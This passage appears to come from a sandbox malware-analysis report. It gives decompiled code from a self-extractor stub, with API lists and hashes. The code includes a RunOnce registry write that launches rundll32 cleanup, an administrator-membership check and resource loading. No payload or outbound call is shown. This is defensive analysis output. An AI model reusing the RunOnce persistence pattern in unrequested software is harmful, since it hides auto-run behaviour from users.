								if(RegQueryValueExA(_v284, 0x391140, 0,  &_v280, _t61,  &_v288) == 0) {
									_t45 = _v280;
									if(_t45 != 2) {
										L9:
										if(_t45 == 1) {
											goto L10;
										}
									} else {
										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
											_t45 = _v280;
											goto L9;
										} else {
											_t59 = 0x104;
											E00391680(_t61, 0x104,  &_v268);
											L10:
											_t50 = 1;
										}
									}
								}
								RegCloseKey(_v284);
								L15:
								if(_t50 == 0) {
									goto L16;
								}
							}
						}
					}
				}
				return E00396CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
			}

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CharUpperA.USER32(74C05EB4,00000000,00000000,00000000), ref: 003927A8
                                                                                                                                                                                                    • CharNextA.USER32(0000054D), ref: 003927B5
                                                                                                                                                                                                    • CharNextA.USER32(00000000), ref: 003927BC
                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00392829
                                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,00391140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00392852
                                                                                                                                                                                                    • ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00392870
                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 003928A0
                                                                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 003928AA
                                                                                                                                                                                                    • GetSystemDirectoryA.KERNEL32 ref: 003928B9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 003927E4
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                                                                                                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                                                                                                                                                    • API String ID: 2659952014-2428544900
                                                                                                                                                                                                    • Opcode ID: 99a52fa49e25eee986d1f338a6be76a663e05995f034416b0847f637c3334096
                                                                                                                                                                                                    • Instruction ID: 622b907c2ce06b471083f50400758771da4e54447a64418918c49265747519ed
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 99a52fa49e25eee986d1f338a6be76a663e05995f034416b0847f637c3334096
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6F41A271A0412CAFDF269B649C85AFB77BDEB55700F0040AAF549E2110DB708E858FA1
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 62%
                                                                                                                                                                                                     			// Writes a RunOnce value ("wextract_cleanup1") that runs rundll32 advpack.dll,DelNodeRunDLL32
                                                                                                                                                                                                     			// against the IXP001.TMP extraction directory, i.e. the standard wextract self-extractor
                                                                                                                                                                                                     			// cleanup; the RunOnce value is a persistence/forensic artifact worth checking for.
                                                                                                                                                                                                     			E00392267() {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				char _v836;
                                                                                                                                                                                                    				void* _v840;
                                                                                                                                                                                                    				int _v844;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t19;
                                                                                                                                                                                                    				intOrPtr _t33;
                                                                                                                                                                                                    				void* _t38;
                                                                                                                                                                                                    				intOrPtr* _t42;
                                                                                                                                                                                                    				void* _t45;
                                                                                                                                                                                                    				void* _t47;
                                                                                                                                                                                                    				void* _t49;
                                                                                                                                                                                                    				signed int _t51;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t19 =  *0x398004; // 0x74c05eb4
                                                                                                                                                                                                    				_t20 = _t19 ^ _t51;
                                                                                                                                                                                                    				_v8 = _t19 ^ _t51;
                                                                                                                                                                                                    				if( *0x398530 != 0) {
                                                                                                                                                                                                    					_push(_t49);
                                                                                                                                                                                                    					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
                                                                                                                                                                                                    						_push(_t38);
                                                                                                                                                                                                    						_v844 = 0x238;
                                                                                                                                                                                                     						if(RegQueryValueExA(_v840, "wextract_cleanup1", 0, 0,  &_v836,  &_v844) == 0) { // value name per the APIs/Strings lists (xref 003922CD)
                                                                                                                                                                                                    							_push(_t47);
                                                                                                                                                                                                    							memset( &_v268, 0, 0x104);
                                                                                                                                                                                                    							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                    								E0039658A( &_v268, 0x104, 0x391140);
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_push("C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\");
                                                                                                                                                                                                    							E0039171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
                                                                                                                                                                                                    							_t42 =  &_v836;
                                                                                                                                                                                                    							_t45 = _t42 + 1;
                                                                                                                                                                                                    							_pop(_t47);
                                                                                                                                                                                                    							do {
                                                                                                                                                                                                    								_t33 =  *_t42;
                                                                                                                                                                                                    								_t42 = _t42 + 1;
                                                                                                                                                                                                    							} while (_t33 != 0);
                                                                                                                                                                                                    							RegSetValueExA(_v840, "wextract_cleanup1", 0, 1,  &_v836, _t42 - _t45 + 1);
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t20 = RegCloseKey(_v840);
                                                                                                                                                                                                    						_pop(_t38);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_pop(_t49);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return E00396CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
                                                                                                                                                                                                     			}

                                                                                                                                                                                                     Code line addresses: 0x00392272 to 0x0039238f

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 003922A3
                                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,wextract_cleanup1,00000000,00000000,?,?,00000001), ref: 003922D8
                                                                                                                                                                                                    • memset.MSVCRT ref: 003922F5
                                                                                                                                                                                                    • GetSystemDirectoryA.KERNEL32 ref: 00392305
                                                                                                                                                                                                    • RegSetValueExA.ADVAPI32(?,wextract_cleanup1,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 0039236E
                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0039237A
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • wextract_cleanup1, xrefs: 0039227C, 003922CD, 00392363
                                                                                                                                                                                                    • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00392299
                                                                                                                                                                                                    • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 0039232D
                                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00392321
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                                                                                     • Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                     • Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                     • Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                     • Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup1
                                                                                                                                                                                                    • API String ID: 3027380567-2048191181
                                                                                                                                                                                                    • Opcode ID: 842a0f8915a133b7cac062de45a442ff22a80f73d53f277717c63cbf06544dbc
                                                                                                                                                                                                    • Instruction ID: 8671e235dc842ea7641ef4e384b502dc59aedc7c06dabf6a957dce99cf0d022b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 842a0f8915a133b7cac062de45a442ff22a80f73d53f277717c63cbf06544dbc
                                                                                                                                                                                                    • Instruction Fuzzy Hash: CD31B871900218BBDF239B55DC85FEB777CEB55700F0001A6F50DE6150DA715B48CA50
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 87%
                                                                                                                                                                                                    			E00393100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                    				void* _t8;
                                                                                                                                                                                                    				void* _t11;
                                                                                                                                                                                                    				void* _t15;
                                                                                                                                                                                                    				struct HWND__* _t16;
                                                                                                                                                                                                    				struct HWND__* _t33;
                                                                                                                                                                                                    				struct HWND__* _t34;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t8 = _a8 - 0xf;
                                                                                                                                                                                                    				if(_t8 == 0) {
                                                                                                                                                                                                    					if( *0x398590 == 0) {
						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
						 *0x398590 = 1;
					}
					L13:
					return 0;
				}
				_t11 = _t8 - 1;
				if(_t11 == 0) {
					L7:
					_push(0);
					L8:
					EndDialog(_a4, ??);
					L9:
					return 1;
				}
				_t15 = _t11 - 0x100;
				if(_t15 == 0) {
					_t16 = GetDesktopWindow();
					_t33 = _a4;
					E003943D0(_t33, _t16);
					SetDlgItemTextA(_t33, 0x834,  *0x398d4c);
					SetWindowTextA(_t33, "nst0dum");
					SetForegroundWindow(_t33);
					_t34 = GetDlgItem(_t33, 0x834);
					 *0x3988b8 = GetWindowLongA(_t34, 0xfffffffc);
					SetWindowLongA(_t34, 0xfffffffc, E003930C0);
					return 1;
				}
				if(_t15 != 1) {
					goto L13;
				}
				if(_a12 != 6) {
					if(_a12 != 7) {
						goto L9;
					}
					goto L7;
				}
				_push(1);
				goto L8;
			}

APIs
• EndDialog.USER32(?,00000000), ref: 0039313B
• GetDesktopWindow.USER32 ref: 0039314B
• SetDlgItemTextA.USER32(?,00000834), ref: 0039316A
• SetWindowTextA.USER32(?,nst0dum), ref: 00393176
• SetForegroundWindow.USER32(?), ref: 0039317D
• GetDlgItem.USER32(?,00000834), ref: 00393185
• GetWindowLongA.USER32(00000000,000000FC), ref: 00393190
• SetWindowLongA.USER32(00000000,000000FC,003930C0), ref: 003931A3
• SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 003931CA
Strings
Memory Dump Source
• Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
• Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
Similarity
• API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
• String ID: nst0dum
• API String ID: 3785188418-432003757
• Opcode ID: 55e444d88866261313e0f070029df86cc7e58eca10b1e468805bf6f4aa582555
• Instruction ID: 64cc585ffd12ef7a51c9b1325663316d9e66c5d6ab0034af10bb258ab8c36c32
• Opcode Fuzzy Hash: 55e444d88866261313e0f070029df86cc7e58eca10b1e468805bf6f4aa582555
• Instruction Fuzzy Hash: B6119372248611BBDF136F249C0CBAA3A6CFB4B721F110712F825D51F0DB769A41D796
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 91%
			E003918A3(void* __edx, void* __esi) {
				signed int _v8;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				char _v20;
				long _v24;
				void* _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				signed int _t23;
				long _t45;
				void* _t49;
				int _t50;
				void* _t52;
				signed int _t53;

				_t51 = __esi;
				_t49 = __edx;
				_t23 =  *0x398004; // 0x74c05eb4
				_v8 = _t23 ^ _t53;
				_t25 =  *0x398128; // 0x2
				_t45 = 0;
				_v12 = 0x500;
				_t50 = 2;
				_v16.Value = 0;
				_v20 = 0;
				if(_t25 != _t50) {
					L20:
					return E00396CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
				}
				if(E003917EE( &_v20) != 0) {
					_t25 = _v20;
					if(_v20 != 0) {
						 *0x398128 = 1;
					}
					goto L20;
				}
				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
					goto L20;
				}
				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
					L17:
					CloseHandle(_v28);
					_t25 = _v20;
					goto L20;
				} else {
					_push(__esi);
					_t52 = LocalAlloc(0, _v24);
					if(_t52 == 0) {
						L16:
						_pop(_t51);
						goto L17;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
                                                                                                                                                                                                    						L15:
                                                                                                                                                                                                    						LocalFree(_t52);
                                                                                                                                                                                                    						goto L16;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						if( *_t52 <= 0) {
                                                                                                                                                                                                    							L14:
                                                                                                                                                                                                    							FreeSid(_v32);
                                                                                                                                                                                                    							goto L15;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t15 = _t52 + 4; // 0x4
                                                                                                                                                                                                    						_t50 = _t15;
                                                                                                                                                                                                    						while(EqualSid( *_t50, _v32) == 0) {
                                                                                                                                                                                                    							_t45 = _t45 + 1;
                                                                                                                                                                                                    							_t50 = _t50 + 8;
                                                                                                                                                                                                    							if(_t45 <  *_t52) {
                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							goto L14;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						 *0x398128 = 1;
                                                                                                                                                                                                    						_v20 = 1;
                                                                                                                                                                                                    						goto L14;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 003917EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,003918DD), ref: 0039181A
                                                                                                                                                                                                      • Part of subcall function 003917EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0039182C
                                                                                                                                                                                                      • Part of subcall function 003917EE: AllocateAndInitializeSid.ADVAPI32(003918DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,003918DD), ref: 00391855
                                                                                                                                                                                                      • Part of subcall function 003917EE: FreeSid.ADVAPI32(?,?,?,?,003918DD), ref: 00391883
                                                                                                                                                                                                      • Part of subcall function 003917EE: FreeLibrary.KERNEL32(00000000,?,?,?,003918DD), ref: 0039188A
                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 003918EB
                                                                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 003918F2
                                                                                                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 0039190A
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00391918
                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000000,?,?), ref: 0039192C
                                                                                                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 00391944
                                                                                                                                                                                                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00391964
                                                                                                                                                                                                    • EqualSid.ADVAPI32(00000004,?), ref: 0039197A
                                                                                                                                                                                                    • FreeSid.ADVAPI32(?), ref: 0039199C
                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000), ref: 003919A3
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 003919AD
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                    • Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2168512254-0
                                                                                                                                                                                                    • Opcode ID: 2d399ad3806934c313a3bf2946d58aa9ad466cab713004f500eb6be166861401
                                                                                                                                                                                                    • Instruction ID: 6625142d02770b48f0c4d4c9f59f4990f4f191aed8e278f7d2d76e6dfc32a5d3
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2d399ad3806934c313a3bf2946d58aa9ad466cab713004f500eb6be166861401
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 44311E71A0060AAFDF229FA5DC58ABFBBBCFF45740F100526E545E2260D7329905CBA1
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 82%
E0039468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
	long _t4;
	void* _t11;
	CHAR* _t14;
	void* _t15;
	long _t16;

	_t14 = __ecx;
	_t11 = __edx;
	_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
	_t16 = _t4;
	if(_t16 <= _a4 && _t11 != 0) {
		if(_t16 == 0) {
			L5:
			return 0;
		}
		_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
		if(_t15 == 0) {
			goto L5;
		}
		__imp__memcpy_s(_t11, _a4, _t15, _t16);
		FreeResource(_t15);
		return _t16;
	}
	return _t4;
}

APIs
• FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003946A0
• SizeofResource.KERNEL32(00000000,00000000,?,00392D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003946A9
• FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003946C3
• LoadResource.KERNEL32(00000000,00000000,?,00392D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003946CC
• LockResource.KERNEL32(00000000,?,00392D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003946D3
• memcpy_s.MSVCRT ref: 003946E5
• FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003946EF
Strings
Memory Dump Source
• Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
• Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
Similarity
• API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
• String ID: TITLE$nst0dum
• API String ID: 3370778649-1250357435
• Opcode ID: ef501707995ed90aff0f733da9b3337f9b8366175994a02888e79e92506df9a9
• Instruction ID: a9133d93b41a02f4af16b70741b13aa9be242189a36237827b7a5eeb40eb4e37
• Opcode Fuzzy Hash: ef501707995ed90aff0f733da9b3337f9b8366175994a02888e79e92506df9a9
• Instruction Fuzzy Hash: D60128722407007BE7221BA56C0DF2B3E2CDBCAF62F050116FE4987280C9B28C4282F2
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 94%
E0039681F(void* __ebx) {
	signed int _v8;
	char _v20;
	struct _OSVERSIONINFOA _v168;
	void* _v172;
	int* _v176;
	int _v180;
	int _v184;
	void* __edi;
	void* __esi;
	signed int _t19;
	long _t31;
	signed int _t35;
	void* _t36;
	intOrPtr _t41;
	signed int _t44;

	_t36 = __ebx;
	_t19 =  *0x398004; // 0x74c05eb4
	_v8 = _t19 ^ _t44;
	_t41 =  *0x3981d8; // 0x0
	_t43 = 0;
	_v180 = 0xc;
	_v176 = 0;
	if(_t41 == 0xfffffffe) {
		 *0x3981d8 = 0;
		_v168.dwOSVersionInfoSize = 0x94;
		if(GetVersionExA( &_v168) == 0) {
			L12:
			_t41 =  *0x3981d8; // 0x0
		} else {
			_t41 = 1;
			if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
				goto L12;
			} else {
				_t31 = RegQueryValueExA(_v172, 0x391140, 0,  &_v184,  &_v20,  &_v180);
				_t43 = _t31;
				RegCloseKey(_v172);
				if(_t31 != 0) {
					goto L12;
				} else {
					_t40 =  &_v176;
					if(E003966F9( &_v20,  &_v176) == 0) {
						goto L12;
					} else {
						_t35 = _v176 & 0x000003ff;
						if(_t35 == 1 || _t35 == 0xd) {
							 *0x3981d8 = _t41;
						} else {
							goto L12;
						}
					}
				}
			}
		}
	}
	_t18 =  &_v8; // 0x39463b
	return E00396CE0(_t41, _t36,  *_t18 ^ _t44, _t40, _t41, _t43);
}
                                                                                                                                                                                                    0x0039692b
                                                                                                                                                                                                    0x00396932
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0039692b
                                                                                                                                                                                                    0x0039691c
                                                                                                                                                                                                    0x0039690a
                                                                                                                                                                                                    0x00396885
                                                                                                                                                                                                    0x00396876
                                                                                                                                                                                                    0x00396940
                                                                                                                                                                                                    0x00396951

APIs
• GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0039686E
• GetSystemMetrics.USER32(0000004A), ref: 003968A7
• RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 003968CC
• RegQueryValueExA.ADVAPI32(?,00391140,00000000,?,?,0000000C), ref: 003968F4
• RegCloseKey.ADVAPI32(?), ref: 00396902
  • Part of subcall function 003966F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,0039691A), ref: 00396741
Strings
Memory Dump Source
• Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
• Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
Similarity
• API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
• String ID: ;F9$Control Panel\Desktop\ResourceLocale
• API String ID: 3346862599-1880301537
• Opcode ID: 8345cf4033de02ea654ad45271ce13b9a13560d65d9a987e36d13bbadea3df1b
• Instruction ID: 2aefeb7eb0c11e23cf2c0ddbbf2724fc4ed7cd9048319d79a919155c455ecdcf
• Opcode Fuzzy Hash: 8345cf4033de02ea654ad45271ce13b9a13560d65d9a987e36d13bbadea3df1b
• Instruction Fuzzy Hash: 40314431A022289FDF33CB51DC46FAA777CEB85758F0101A7E949A6150DB319D85CF92
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 57%
E003917EE(intOrPtr* __ecx) {
	signed int _v8;
	short _v12;
	struct _SID_IDENTIFIER_AUTHORITY _v16;
	_Unknown_base(*)()* _v20;
	void* _v24;
	intOrPtr* _v28;
	void* __ebx;
	void* __edi;
	void* __esi;
	signed int _t14;
	_Unknown_base(*)()* _t20;
	long _t28;
	void* _t35;
	struct HINSTANCE__* _t36;
	signed int _t38;
	intOrPtr* _t39;

	_t14 =  *0x398004; // 0x74c05eb4
	_v8 = _t14 ^ _t38;
	_v12 = 0x500;
	_t37 = __ecx;
	_v16.Value = 0;
	_v28 = __ecx;
	_t28 = 0;
	_t36 = LoadLibraryA("advapi32.dll");
	if(_t36 != 0) {
		_t20 = GetProcAddress(_t36, "CheckTokenMembership");
		_v20 = _t20;
		if(_t20 != 0) {
			 *_t37 = 0;
			_t28 = 1;
			if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
				_t37 = _t39;
				 *0x39a288(0, _v24, _v28);
				_v20();
				if(_t39 != _t39) {
					asm("int 0x29");
				}
				FreeSid(_v24);
			}
		}
		FreeLibrary(_t36);
	}
	return E00396CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
}


APIs
• LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,003918DD), ref: 0039181A
• GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0039182C
• AllocateAndInitializeSid.ADVAPI32(003918DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,003918DD), ref: 00391855
• FreeSid.ADVAPI32(?,?,?,?,003918DD), ref: 00391883
• FreeLibrary.KERNEL32(00000000,?,?,?,003918DD), ref: 0039188A
Strings
Memory Dump Source
• Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
• Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
Similarity
• API ID: FreeLibrary$AddressAllocateInitializeLoadProc
• String ID: CheckTokenMembership$advapi32.dll
• API String ID: 4204503880-1888249752
• Opcode ID: 1493e329ffe878272716427aa9d552c5c6a0ed2961704397c042bd5836d51d86
• Instruction ID: 966cec47a6b564def16d01d7e4ff0164f8c267ea2927e3588a1a62af0ef5a706
• Opcode Fuzzy Hash: 1493e329ffe878272716427aa9d552c5c6a0ed2961704397c042bd5836d51d86
• Instruction Fuzzy Hash: B5116371E00209ABDB129FA4DC4AABEBB7CEF44701F11056AFA15E2390DA719D049BD5
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00393450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
	void* _t7;
	void* _t11;
	struct HWND__* _t12;
	int _t22;
	struct HWND__* _t24;

	_t7 = _a8 - 0x10;
	if(_t7 == 0) {
		EndDialog(_a4, 2);
		L11:
		return 1;
	}
	_t11 = _t7 - 0x100;
	if(_t11 == 0) {
		_t12 = GetDesktopWindow();
		_t24 = _a4;
		E003943D0(_t24, _t12);
		SetWindowTextA(_t24, "nst0dum");
		SetDlgItemTextA(_t24, 0x838,  *0x399404);
		SetForegroundWindow(_t24);
		goto L11;
	}
	if(_t11 == 1) {
		_t22 = _a12;
		if(_t22 < 6) {
			goto L11;
		}
